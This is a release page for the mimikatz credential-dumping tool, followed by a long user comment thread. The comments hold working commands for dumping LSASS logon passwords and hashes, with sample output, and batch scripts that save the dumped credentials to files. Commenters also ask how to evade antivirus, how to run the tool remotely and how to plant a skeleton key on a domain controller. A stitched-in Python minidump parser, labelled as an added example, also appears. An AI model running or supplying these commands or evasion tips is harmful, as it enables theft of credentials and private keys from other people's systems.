# mimikatz 2.0 has just been released as an alpha version

## For those in a hurry looking for passwords…

mimikatz # privilege::debug
Privilege '20' OK

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Domain   : vm-w7-ult-x
* LM       : d0e9aee149655a6075e4540af1f22d3b
* NTLM     : cc36cf7a8514893efccd332446158b1a
* SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Domain   : vm-w7-ult-x
...

## 501 thoughts on « mimikatz »

• Many thanks for your explanation: « it keeps them in memory ». If the user does not log in and log out we cannot exploit this tool.

1. Input « ^Z » in mimikatz.exe command, it will run always you ctrl-c.

• I run it as administrator on Win7 SP1
but get an error
Hints are as follows:
Demande d’ACTIVATION du privilege: SeDebugPriviliege:OK
Erreur:Impossible d’injecter !; 拒绝访问
Erreur:pas ou plus de communication etablie

How so? Thanks

• This is the full console output.

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 580
Erreur : Impossible d’injecter ! ; (0x00000005) 拒绝访问。

Erreur : pas ou plus de communication établie

3. secpol.msc -> Local Policies -> User Rights Assignments -> Debug Programs
This is also how you stop Pass-The-hash from working too.
I’ve tried on Win7 and XP SP3 (english) and I get this error on XP
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 640
Erreur : Impossible d’injecter ! ; (0x00000008) Not enough storage is available to process this command.
Same with Win7 (64-bit), only the hex is different
Erreur : Impossible d’injecter ! ; (0xc0000022) {Access Denied} A process has requested access to an object, but has not been granted those access rights.

• Nevermind :) I was not using the 64-bit (x64) version on my 64-bit OS.
Also to work around removing the sedebug priv using group policy and or secpol.msc, you can run as system (psexec -s cmd.exe) and everything works well. Very good tool, I hope you make even more additions! (@dumpall would be cool too, dump anything and everything this tool has to offer)
-william

• 0x00000008 is from an NT 5 RDP session, not because the debug right was removed ;)
in both cases : psexec -s XXX … no need of debug right, and bypass session isolation in RDP ;)

• Thanks !!! I’ve already relied on manual stack creation and got it working, but with NT 6, I prefer RtlCreateUserThread :)

4. Isn’t this how Windows can send HTTP-Authentication using IE without prompting for the password? If so, could a program like Firefox, launched as the same user who is logged on, read those credentials and also pass HTTP-authentication without being prompted? This could add functionality to something like FF if this was so, could it not? I mean IE does it…
-mandingo-

• In some way yes. But Windows does not need it for Kerberos or NTLM auth. Just for some Digest auth.
Firefox can use Kerberos and NTLM auth with SSO (see network.negotiate-auth.*), maybe wdigest too ?
In any case, no need for a hack for that, Windows allows « normal » APIs to obtain responses to challenges.

5. C:\Program Files\WinRAR\ts\Win32>mimikatz.exe
mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 452
Erreur : Impossible d'injecter ! ; (0x00000008) 存储空间不足，无法处理此命令。

mimikatz #

help me

6. FYI, Windows 8 (dev-preview) is working for me so far. Haven’t tried all the commands yet but so far so good. Is there a way to run all commands planned? Maybe output to a single file?
-mandingo-

• I have some surprises for Windows 8 Consumer Preview :)
There are some problems with the current version, internal is 90% for x64, and 70% x86.

7. Let's add to the collection of thanks in foreign languages :)
Thank you!

8. Hey, how about a natively english version? I had french in school, but it’s a bit rusty tbh ;)

9. LOL, this is a piece of software that can do a lot of things, I like it a lot ^.^
but there are too many methods TT, every time I have to come here to look up the reminder, maybe it's me who got it wrong, since the French language is complicated for us, anyway one has to learn.
Good luck and I wish you a very happy 2012.

10. Very nice work. I successfully got clear text passwords by injecting into LSASS on Windows 2008 R2, however, I had a problem on Windows 7 x64. I launched a local cmd.exe shell as Local System by using PsExec. From there I launched mimikatz. After typing @getLogonPasswords, the data was there but the wdigest passwords were completely garbled text. I guess something went wrong with the injection. I wonder if it has anything to do with ASLR.

• No problem with ASLR ;) It must be unicode or an incorrect unicode string for the computer account, but it appears to be valid in unicode… :( (try chcp before ;))
Why did you use psexec to get system ? You can use privilege::debug

• Yes, privilege::debug worked better. On this PC, I was only able to retrieve my smartcard PIN, because I don’t log in with my password. :)

• SecureID ?
mimikatz displayed your pin code of RSA SecureID ? (or entire pin + code ?)
If so, I’ll LOVE this provider !

• Yeah — it showed just the portion of the PIN that I type to login/unlock my PC. It did not of course display the automatically changing code that is shown on the LCD display. :)

11. Note that I must have recently unlocked my PC in order for the RSA SecureID PIN to show up — if I have not logged in or unlocked the PC within 30 minutes or so, the PIN does not appear in the list. Alright, here is my mimikatz output. I ran it first, and did not see RSA PIN. Then, I locked my workstation and then unlocked it, then I ran @getLogonPasswords again. Then I did see my RSA PIN displayed. I have tried to change names and hashes to protect the innocent. :)

mimikatz # @getLogonPasswords

Authentification Id         : 0;618713
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
wdigest :
tspkg :         n.t. (LUID KO)

Authentification Id         : 0;613648
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
wdigest :
tspkg :         n.t. (LUID KO)
mimikatz # @getLogonPasswords

Authentification Id         : 0;618713
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
wdigest :       THIS_IS_MY_RSA_PIN
tspkg :         n.t. (LUID KO)

Authentification Id         : 0;613648
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
wdigest :       THIS_IS_MY_RSA_PIN
tspkg :         n.t. (LUID KO)
• So funny :), maybe you can try @getLogonPasswords full for « full » information.
Is your NTLM(RSA_PIN) same as msv1_0 NTLM hash ?

I’m @PHDays, unfortunately I cannot test it now :)

• That’s a good question… I’ll have to crack it with something like ighashgpu. Since I know what it is, it should be pretty easy to crack the hash. :)

• You don’t have to do that !
When it’s available, take the cleartext PIN code, hash it in NTLM, compare :)

12. Sorry, I got distracted with other things…

No it’s odd – mimikatz will dump my SecureID PIN as the « wdigest » but the corresponding NTLM hash does not match either the PIN or my user account password. I don’t know what it is.

13. congratulations!! nice work!!
just one request: can you create a full english version?
Merci :D

14. I downloaded your source code, but there is something I could not find, like the function GetMSVLogonData. Can you show how it works? Thank you! :)

18. mimikatz is a first-rate piece of work!
I watched the presentation and saw the word СПАСИБО (thank you)!
So maybe you'll understand) Thank you very much!

21. Mimikatz FTW! Allowed me to circumvent my IT department’s issuing of a new RSA certificate when I changed my home PC, thus saving much time and stress. Merci!

22. Hello,

FYI, mimikatz does not work on Windows 2003 Enterprise (English) in the pre-service-pack version.
“The procedure entry point EncodePointer could not be located in the dynamic link library KERNEL32.dll”. The DLL version is 5.2.3790.

It works fine once SP2 is installed (SP1 not tested).

Many thanks for the tool!

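23. This is all gibberish to me. Hello, foreign hackers! I don't understand anything you are saying; I really don't know your language, how did you learn it?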

24. hello – any chances to have this tool in english? :) thx

25. If pressing the TAB key could complete the keywords, the software would be even better

27. Can you attack remote PC’s with this or you have to be on the actual clients machine to run this? You would also need to have admin rights I’m assuming.

Good tool, now just trying to see if it can be executed to gain access to a remote pc. I’m the IT guy at work.

Keep up the good work.

28. Is there any way to run mimikatz in memory instead of copying it to the remote machine?

29. Microsoft Forefront is detecting the Alpha as well as RC of Mimikatz, is there a way we can run it without encrypting the exe to bypass the AV.

30. What is the command-line format in the new alpha version ?

mimikatz.exe privilege::debug sekurlsa::logonPasswords exit >> result.txt

in batch mode it crashes

32. Is there any effective way to protect against this technique?

By the way, congratulations for the tool.

33. Will I be able to export a Certificate along with its private key even if the key isn’t exportable and import the Certificate to another computer?

Thanks.

• Well is there any way that you know for sure? I need to format my computer and reinstall windows, but before I do, I want to make sure that I will be able to use my certificate again.

Is there a way to do this?

Thanks.

34. Hi mate, awesome tool. any chance it will be able to dump domain user hashes (usually from ActiveDirectory) in NTLM / LM format? I have yet to find a program which is lightweight or small that can do it would be great man!

keep it up!

35. Is it possible to convert from an exe into native powershell?

• PowerShell tool: RWMC – Reveal Windows Memory Credentials - https://github.com/giMini/RWMC

36. Why is it that I cannot unzip these binaries? Am I missing something? Trying to use it in conjunction with USB rubber ducky and it doesn’t seem to want to unzip with 7zip or RAR

• Nevermind I got it. Must have been my AV not allowing a full download. Thanks for the great tool!

37. mimikatz # sekurlsa::minidump c.dmp
Switch to MINIDUMP

ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) !=
PROCESSOR_ARCHITECTURE_INTEL (0)
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

mimikatz #
38. Any new information on how to use the mimilib.dll

Thanks

39. I’m struggling with 2.0 version in order to export certificates. The « crypto::certificates » only lists me certificates stores, but no idea how to export… Please advise

40. Hi, thank you for this tool. What can you do with high protected certificates?
Do you know what function verifies the password for export private key?

• ok, do you know how is the password used to encrypt and where is it(or its hash) stored?

41. Hey =)
Is it possible to use mimikatz with a RAM dump?
If not, this would be a nice feature.

Greets from Germany
Chris

• Thanks, but i only have complete images in RAW Format. Do you know any way to extract passwords out of that?

• MANY THANKS TO YOU for programming the WinDbg extension!!! I saw a post yesterday on Twitter with a comment on this extension, today I checked it out. It is VERY NICE! I had a little fight with the wow64exts in WinDbg but finally it worked! Many thanks and greets from Germany!
Greets Chris

42. Excellent information on the DPAPI SHA1 hash! The question remains how it has been generated since Windows Vista, given that it is no longer « simply » SHA1(UNICODE(password))?

• Thanks for these details, I will look into this, as well as the sekurlsa::dpapi option, more closely as soon as I have the time ;-)

43. (sorry I write in English, my French is not very good)

I’ve seen that Windows 8.1 is supported in alpha 2.0 version.
However, clear password dump is not available anymore.

Is it because of a new protection (or a better handle) of Windows 8.1?

I have found no information regarding the new countermeasures in Windows 8.1.

And congrats for the great and so useful tool!

• mimikatz dumps passwords when they’re in memory, when they’re not…. ;)

Windows 8.1 does not keep passwords in memory as usual. Only LiveSSP as I’ve seen (or when you enable Credentials Delegations)

44. Having a buggy issue with mimikatz alpha 2.0 x64 and Windows 8.1 enterprise.

When using either procdump with sekurlsa::minidump… or mimikatz alone to pull lsass.exe… I do not get any passwords from a Windows 8.1 x64 system that has just been logged into. No errors, just « password: (null) » everywhere I would expect a password.

If I lock the system, and unlock using a password… then run procdump or mimikatz again… I DO get a correct password.
It seems the first logon password is not stored in lsass process memory, or not at the offset that mimikatz is looking. But subsequent credential input is properly retrieved (such as lock and unlock).
In Windows 7 x64… works perfectly. Can pull passwords from very first logon.

• As you’ve seen, this is not a mimikatz issue ; Windows 8.1 does not store « by default » passwords in memory (see previous comment)
Like in NT5 with Kerberos provider, some passwords fields are populated after unlocking.

You can check this with : sekurlsa::searchpasswords.
It searches the whole process for credentials, and it’s provider / offset independent.

45. I am using the new version. I try to export a certificate from the computer store, but cannot figure out how to change the store. Is there a way to do this?
Thank you for the tool,
-D

mimikatz # crypto::stores
Asking for System Store ‘CERT_SYSTEM_STORE_CURRENT_USER’ (0x00010000)

• You can use /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE for example (and /export to export ;))

46. Has something changed with the new version?

It used to work on my Win7 Enterprise 64bit, but suddenly not anymore. (running the 64bit version). It looks like the password is still hashed / encrypted.. Anyone else have this problem? Other than that, excellent tool, much respect!

Thanks for your feedback!

Output example (I replaced some info with XXXXXXXXXX)

User Name         : XXXXXXXXXX
Domain            : NT Service
SID               : S-1-5-80-997390408-XXXXXXXXXX-3119169589-2253446180-22265637
86
msv :
[00000003] Primary
* Domain   : UK
* LM       : 00000000000000000000000000000000
* NTLM     : 3bdf6dc3f414a299b1acfdaa80d8030d
* SHA1     : 3b6264001febc9917d700cb04f1307667fcfb050
tspkg :
* Domain   : UK
* Password : b2 28 3b f5 eb 00 d3 31 1f 4b 57 1d 86 ca 1f ca 8f c1 36 a
1 cf e0 73 20 70 a6 47 12 de 25 37 b8 48 9c 3f 3e 06 03 64 d0 5c e6 cd 28 fc d3
38 ac 08 a0 bc bb 5a bf b7 7b d3 0b 92 7b 56 32 26 c0 d8 b0 f1 8a ce cb b5 df ce
a4 36 69 b8 be f7 55 4a 03 05 8b a7 79 d8 de 11 06 5e e3 27 9d f7 9f 81 dd a0 2
a 1f 83 3b a2 75 ee 08 7d e3 a5 cf 17 29 73 77 8a d8 dc 59 8f 3d 09 70 f9 1a d5
1a 23 5c fa 03 7b b0 18 d4 3f da d4 1e 94 2d 0b b1 e7 6f f1 f3 1e a7 ab 21 0a 36
c6 64 05 5e 11 cf 9a cf f5 42 f6 c9 ed 0d ee a9 4a 3a 6c 44 cf d5 f1 c8 fd eb 3
6 a6 93 ee c5 14 d1 6f b1 0e 01 30 44 3c 3d 3d c4 30 e4 77 e8 5e 12 7a 8f ee 60
c2 3d dd 84 a5 6a 75 07 32 ff bd 84 84 8f ff 8c 17 a1 54 7a fe dc 52 74 b9 cb 6e
d2 62 6c d6 ec 35 b6
• Hi Michel,

Service passwords, computer passwords, and some others are not necessarily « human readable ». Nobody types them ! So in some cases Windows generates random « binary » passwords !

In your case b2 28 3b f5 [...] d6 ec 35 b6 is the real binary password =)

const BYTE pwd[] = {0xb2, 0x28, 0x3b, 0xf5, [...], 0xd6, 0xec, 0x35, 0xb6};
SHA_CTX shactxInput;
SHA_DIGEST shaInput;

A_SHAInit(&shactxInput);
A_SHAUpdate(&shactxInput, pwd, sizeof(pwd));
A_SHAFinal(&shactxInput, &shaInput);

kull_m_string_wprintf_hex(shaInput.digest, SHA_DIGEST_LENGTH, 1);

Output is : 3b 62 64 00 1f eb c9 91 7d 70 0c b0 4f 13 07 66 7f cf b0 50, your SHA1 ;)
The mimikatz credentials output routine tries to detect if the password is a printable string; if not, it displays it in hex.

47. Hello again!

Thanks so much for the quick reply! This still leaves me with a couple of questions though:
1) I thought Mimikatz would look for the password stored in memory, which is supposed to be cleartext.
2) Mimikatz used to work on my computer perfectly, and suddenly it only produces hashes (Is the previous version of Mimikatz still available somewhere?)
3) A SHA1 hash is (I think) very hard to decrypt, so Mimikatz doesn’t always work on all systems?

Thanks again for the feedback!

Regards, Michel

• My apologies! I saw that I can still recover the password with the new MK version :) You can delete my two comments if you want.

Thanks again and best regards, Michel.

• Yep, since April 2012… fortunately the source code is available ;)
As for Symantec, what I loved at the time:
« The tool allows an attacker to perform the following actions on the computer:

• Cheat at minesweeper. »
49. Will mimikatz work on ARM chips? Such as a Chromebook?

50. I love Mimikatz it is a great tool.

I like to procdump memory and then use the minidump function to process the dump off the client so even if Mimikatz is picked up by AV and can’t be run locally it will still work! ;-)

But I sometimes get a « MAJOR VERSION » error.

Is this because I am using the wrong version of Mimikatz?

Or does it mean that I am trying to work with a version of Windows such as XP which doesn’t natively have the Tspkg, Wdigest or Kerberos TGT functionality and it is the version of Windows that is wrong?

51. If I don’t run privilege::debug I get « ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005 ». Is there somewhere in your blog explaining what’s going on here that requires it to be run first?

54. save this file as anyname.bat and run as administrator with CMD.
@echo off
For /f "tokens=2-4 delims=/ " %%a in ('date /t') do (set mydate=%%c-%%a-%%b)
For /f "tokens=1-2 delims=/:" %%a in ('time /t') do (set mytime=%%a%%b)
mm.exe privilege::debug sekurlsa::logonpasswords exit > %mydate%_%mytime%

55. Is it possible to use only the mimilib DLL to retrieve passwords programmatically, and if so, is there a description of the functions included in the DLL and of the parameters to use?

• That is clearly not the purpose of the DLL… but whether for mimikatz.exe or mimilib.dll, the source code is open ;)

56. Hello, seems great, but how can i make it FUD ?
do you have a nice crypter to do it ?
because for the moment, Windows delete it instantly :(
(avast i assume)

thanks :)

57. Thank you for mimikatz! I have a problem exporting a computer certificate, I can export only user certificates. Is it possible to change the system store to local machine? I haven’t found the command for that.

58. Hi – great work I love the tool :)

I just have one question, what the heck does mimikatz mean? :D

59. btw – I got a question for you. Can Mimikatz generate Service Tickets (rather than Golden TGTs)?

61. Hello guys!
First of all, this crypto tool is simply fantastic!!!!

I have a simple question:
Is there any way to export the private key which is inside a eToken or smartcard? I tried the tool, but even with the capi and cng patches it didn’t work.

Is there anything that can be done to export a private key inside an eToken?

Thanks
HJ

• I was also wondering if this is possible. I’ve seen this comment – « Some smartcard crypto providers can report a successfull private export (it’s not, of course :wink:) », so I’m not sure if that means there is no way to do it, or additional steps need to be taken. Could anyone elaborate please?

• Responding to my own post, after further reading it looks like even if you are using a software based smartcard crypto provider, part of the key is stored in the trusted platform module chip soldered to your motherboard which is considered secure (it’s been hacked through extreme processes and measures over a period of months and is not a practical exploit).

Someone please correct me if I am wrong!

62. create bat script and run using cmd
@echo off mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > %random%%random%.txt

63. Hello

I create a minidump via the task manager and this is what I then get on the same machine …. Thanks for enlightening me ;-)

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Oct 31 2014 13:30:06)
.## ^ ##.
## / \ ##  /* * *
## \ / ##   Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
'## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
'#####'    Microsoft BlueHat edition!       with 14 modules * * */

mimikatz # sekurlsa::minidump c:\temp\lsass.dmp
Switch to MINIDUMP : 'c:\temp\lsass.dmp'

Opening : 'c:\temp\lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) != PROCESSOR_ARCHITECTURE_INTEL (0)
64. Thanks for your reply. In any case, BRAVO for your work; I think my problem comes from compiling under VS 2013, which may default to 32-bit….
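
The `ProcessorArchitecture (9) != PROCESSOR_ARCHITECTURE_INTEL (0)` error in comments 37 and 63 reports a field of the dump's system-info stream: 9 is `PROCESSOR_ARCHITECTURE_AMD64` and 0 is `PROCESSOR_ARCHITECTURE_INTEL` in the Windows headers. As an added example (not part of the original comments and not mimikatz code), this Python code reads that field, plus the OS version fields that the « MAJOR VERSION » error in comment 50 is assumed to refer to, from a minidump; the function names are hypothetical and the sample dump is constructed in memory.

```python
import struct

# Little-endian layouts of the documented minidump structures.
HEADER = struct.Struct("<4sIIIIIQ")        # MINIDUMP_HEADER (32 bytes)
DIRECTORY = struct.Struct("<III")          # StreamType, DataSize, Rva
SYSTEM_INFO = struct.Struct("<HHHBBIIII")  # first 24 bytes of MINIDUMP_SYSTEM_INFO
SYSTEM_INFO_STREAM = 7                     # MINIDUMP_STREAM_TYPE: SystemInfoStream

# PROCESSOR_ARCHITECTURE_* values from winnt.h.
ARCHITECTURES = {
    0: "PROCESSOR_ARCHITECTURE_INTEL",
    5: "PROCESSOR_ARCHITECTURE_ARM",
    6: "PROCESSOR_ARCHITECTURE_IA64",
    9: "PROCESSOR_ARCHITECTURE_AMD64",
    12: "PROCESSOR_ARCHITECTURE_ARM64",
}


class MinidumpError(ValueError):
    """Raised when the data is not a well-formed minidump."""


def read_system_info(data: bytes) -> dict:
    """Return architecture and OS version recorded in a minidump."""
    if len(data) < HEADER.size:
        raise MinidumpError("too short for a minidump header")
    signature, _version, n_streams, dir_rva, _chk, _ts, _flags = HEADER.unpack_from(data, 0)
    if signature != b"MDMP":
        raise MinidumpError("missing MDMP signature")

    # Walk the stream directory until the system-info stream is found.
    for index in range(n_streams):
        offset = dir_rva + index * DIRECTORY.size
        if offset + DIRECTORY.size > len(data):
            raise MinidumpError("stream directory runs past end of file")
        stream_type, size, rva = DIRECTORY.unpack_from(data, offset)
        if stream_type != SYSTEM_INFO_STREAM:
            continue
        if size < SYSTEM_INFO.size or rva + SYSTEM_INFO.size > len(data):
            raise MinidumpError("truncated SystemInfoStream")
        (arch, _level, _revision, _cpus, _product,
         major, minor, build, _platform) = SYSTEM_INFO.unpack_from(data, rva)
        return {
            "architecture": arch,
            "architecture_name": ARCHITECTURES.get(arch, "unknown"),
            "major": major,
            "minor": minor,
            "build": build,
        }
    raise MinidumpError("no SystemInfoStream in dump")


def describe(info: dict) -> str:
    """One-line summary of the values a reader of the dump must match."""
    return "{} ({}), NT {}.{} build {}".format(
        info["architecture_name"], info["architecture"],
        info["major"], info["minor"], info["build"])


def build_sample_dump(arch: int, major: int, minor: int, build: int) -> bytes:
    """Constructed sample: a minimal dump holding only a system-info stream."""
    n_streams = 2
    dir_rva = HEADER.size
    sysinfo_rva = dir_rva + n_streams * DIRECTORY.size
    # 24 parsed bytes followed by the 32 remaining bytes of the 56-byte structure.
    sysinfo = SYSTEM_INFO.pack(arch, 6, 0, 1, 1, major, minor, build, 2) + bytes(32)
    header = HEADER.pack(b"MDMP", 0xA793, n_streams, dir_rva, 0, 0, 0)
    directory = (DIRECTORY.pack(0, 0, 0)  # UnusedStream entry, skipped by the parser
                 + DIRECTORY.pack(SYSTEM_INFO_STREAM, len(sysinfo), sysinfo_rva))
    return header + directory + sysinfo


if __name__ == "__main__":
    # Constructed values: an AMD64 dump from NT 6.1 build 7601.
    print(describe(read_system_info(build_sample_dump(9, 6, 1, 7601))))
```

An x86 reader that expects architecture 0 will reject a dump whose stream reports 9, which is the situation both error messages above show.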

65. Fantastic tool…. How would I be able to invoke the DLL to call and return the values from C#, any ideas???

66. Hi
I have a Win8 laptop and passwords are not showing any more, just the NTLM hash

68. When i attempt to load the CNG service on Windows 8.1, i get a nice error.

ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000000)

I’ve got no AV running, or anything. Any ideas?

• Running into the same error in Server 2012 (not R2). I have local admin rights, disabled UAC, and disabled the UAC registry key, and have restarted a few times. Any help would be appreciated. Thank you!

mimikatz # crypto::cng
ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000000)

• Looks like the patch didn’t work then. I’m still unable to export my certificate’s private keys. Anything else I can try?

69. It seems that to debug the lsass you need to be a local admin on a machine. But can this tool be used by a person on a remote computer on which that person is not a admin and still get the credentials by any means? Let’s say this is MS domain ;)

I was wondering if there are any traces of passing the ticket?
i.e. is there a special windows event or some way to find that being a domain admin that is concerned about his domain security?

• 2012 does not store cleartext passwords, but the registry can be modified in order to capture the cleartext hash

Set a pass and do it again, you will see it appear..

73. Hi,there
i used misc::skeleton to use skeleton key on dc
but I want to change the password « mimikatz » to my own password
how to change it ?

75. hello,
thanks for the nice tool.
How can it be used remotely?

76. Hey, I need help with Windows 10, I need credentials to hack a password, what do I need to do to hack the password? Answer please, thanks

• There are multiple approaches, all of them having one thing in common. Since I don’t know you and your intentions (who knows, maybe it’s not your device, maybe it is. I can’t tell.) I’ll only give basic advice and a lead, the rest is up to you.
Keep in mind that it has been a year or two since the last time I helped someone regain access. So there are some variables I’m not up-to-date with.

First you should do some research on how windows works, only the basic things are required: How do the user accounts work, are they stored locally? (most likely, but I recall w10 being able to use your user account on multiple devices, I dont know w10’s behaviour when you have no internet connection and use the credentials you use for other devices too (ms account or something? ) > I expect that the user accounts and passwords are stored locally in both cases. > ask and find out how win manages passwords. (if correct, it should be possible to find out services etc used for this purpose.)

Now: first go into a search engine you find handy and effective. Research the above mentioned things.
Write down some keywords and the names of services / programs you suspect of being involved.

Second: Be creative > imagine a door with a lock that’s externally mounted, screws exposed.. You have with you: A set of internals including a new key and a ratchet with 2 attachments, one that’s fitted is torx and one that you found out to be usable on the screws that hold the lock in place.
>> What would you do to gain access?

Swap something over using a commonly available piece of gear so you can replace or remove that what keeps you from getting in.

Good luck.

ps. I usually can’t stand people who ask prior to doing research…
You want something and don’t know how? Start learning then. All you need is available on the internet to read. If you don’t know why a certain method works, you don’t know what you are doing. You don’t know what you are doing, you will ‘hurt’ yourself eventually.

Also, keep things nice and don’t use the underlying method in a way that gets you in trouble. Be wise, it’s your own responsibility.

77. What about when you use email to login like an outlook or other microsoft account? I tried this tool but that account does not show.

78. incredible , also he obtained the password of other equipment that had connected to my local network
you are a god of programming !!!

79. Hello, I have DL mimikatz-2.1.0-alpha-20160506 but there is no mimikatz.exe in it???

• Hello, I am the totally clueless type, but what about when there is no .exe in the files you download?
Only two of us are asking the question, but I think it deserves to be asked…
By the way, well done, at last a Frenchman who codes programs that are really useful ^^. Keep it up

80. Thanks for the tool used it recently for windows 7 worked perfectly, but it doesn’t seem to work anymore on windows 10

82. Hello, my name is Jose Luis, this reads oddly because I am Mexican and using Google to translate the message; does mimikatz work on Win10?

84. Hello,
You can install the tool on a USB to run in the background without noticing?

85. Hi,

I accidentally deleted one certificate from my certificate store. I have the private key, which is stored in folder AppData\Roaming\Microsoft\Crypto\RSA\. I’ve exported the « public » part of the certificate with .cer ending.

If I import certificate into mmc, private key is not found. Do you think, that is possible to « extract » private key just from file, which is stored in AppData\Roaming\Microsoft\Crypto\RSA\? Thank you for answer.

87. Sir my AV (avast) is detecting it and deleting it immediately and I want to run it while the AV is still there in the system (Windows 7)
Pls help its my little project

Thank u for tool works fine without av

88. Hello,
I wonder how many years of experience with c++ do you have ? I would like to know
Thank you,
Wiliam

89. Hello,

first: Thanks for sharing!
But I have a problem. If I use the command « sekurlsa::logonpasswords » I get the username etc., but no password.
« tspk: » is empty.
« wdigest » password shows me: « (null) »

What did I do wrong? I ran the exe as admin, with no antivirus programs or the like ^^

90. Hi, Kaspersky has found a trojan horse at the opening of mimikatz.exe….

92. please add a tool for removable drive (usb and others ) in misc and override administrator security :-)
then nice work for the tools

93. Awesome job! It helped me a lot through a remote session in a machine that needed a restart & the owner didn’t give me the admin password, so I was in the machine in an administrator session, I ran the proper commands & it worked like a charm.

Now I’m trying to experiment through non-admin sessions, on my own machine, & I can’t figure it out. This is the console result:

C:\Windows\System32>cd /MIMIKATZ/mimikatz_trunk/x64

C:\MIMIKATZ\mimikatz_trunk\x64>mimikatz.exe

.#####. mimikatz 2.1.1 (x64) built on Jul 20 2017 01:37:08
.## ^ ##. « A La Vie, A L’Amour »
## / \ ## /* * *
## \ / ## Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
‘#####’ with 21 modules * * */

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz #

As you see, running cmd as admin, in a guest account, results in this error. What am I doing wrong?

95. HELP, When I put « Sekurlsa:: logonpasswords » I do not see the password anywhere. In the site where is « Password » says «  »

97. HELp,Kaspersky has locked lass.exe memory space.
What can I do to pass ka.

• emmmmmmmm…………

somehow this tool was misused by somebody to launch the BadRabbit(NotPetya) Ransomware attack……..

so this tool was also blacklisted by some antivirus company………….

99. Hi, I don't know where to find mimikatz.exe in the downloaded zip or how to get it working? Sorry, not very good with computers.

• Hi,
at first I had the same problem. I downloaded the zip as described, but I could not find mimikatz.exe. Later I discovered that my antivirus program had secretly deleted mimikatz.exe, so I disabled the antivirus program and there you go: mimikatz.exe
My reply is a bit late, but maybe there is someone still looking for a solution ;)
Excuse my French, it has been several years since my last French lesson ;)

100. It does not show me the password on Windows Server 2016… why ?
help please

101. Hello,
I wasn’t able to export certificates with non-exportable private keys in WINDOWS XP.

Details:
.#####. mimikatz 2.1.1 (x86) built on Dec 20 2017 00:17:44
.## ^ ##. « A La Vie, A L’Amour » – (oe.eo)
## / \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
‘## v ##’ Vincent LE TOUX ( vincent.letoux@gmail.com )
‘#####’ > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege ’20’ OK

mimikatz # crypto::capi
Local CryptoAPI patched

mimikatz # crypto::keys /export
* Store : ‘user’
* Provider : ‘MS_ENHANCED_PROV’ (‘Microsoft Enhanced Cryptographic Provide
r v1.0’)
* Provider type : ‘PROV_RSA_FULL’ (1)
* CNG Provider : ‘Microsoft Software Key Storage Provider’

CryptoAPI keys :

CNG keys :

mimikatz #

BR,
Mahir

103. Hi,

I have a laptop with access to both the local administrator account and a domain user account (offline/cached credentials).

The domain user can connect to a corporate VPN which uses a certificate. I want to get the certificate which is non exportable.

When running MimiKatz as the Local admin, it does not pull off the private certificate for the domain user account (maybe because it is not the current user?).

I am not 100% sure its the private certificate I want yet as the VPN profile config refers to a Machine Cert.

Any Tips?

104. Hello,

I’ve tried to decrypt some browser passwords from my old windows 7 laptop. With the help of mimikatz I had already success with some chrome passwords, but I don’t get the clue how to crack Internet Explorer. I took the blob structure from the registry (HKCU\Software\Microsoft/Internet Explorer/IntelliForms/Storage2) containing a Facebook password and typed the following in mimikatz:

This is working fine so far, so the decrypted masterkey is stored in mimikatz’ cache. But as I try to decrypt the blob like this:

dpapi::blob /in:C:\path\to\file\with\value\from\registry /entropy:c0400e6fabb4c395ff857d0614e66508ba8ba737c5 /unprotect

…I get two errors:

ERROR kull_m_dpapi_unprotect_blob ; CryptDecrypt (0x80090005)
ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; CryptUnprotectData (0x0000000d)

What did I miss? Thanks in advance!

John

106. Password does not support special characters such as @

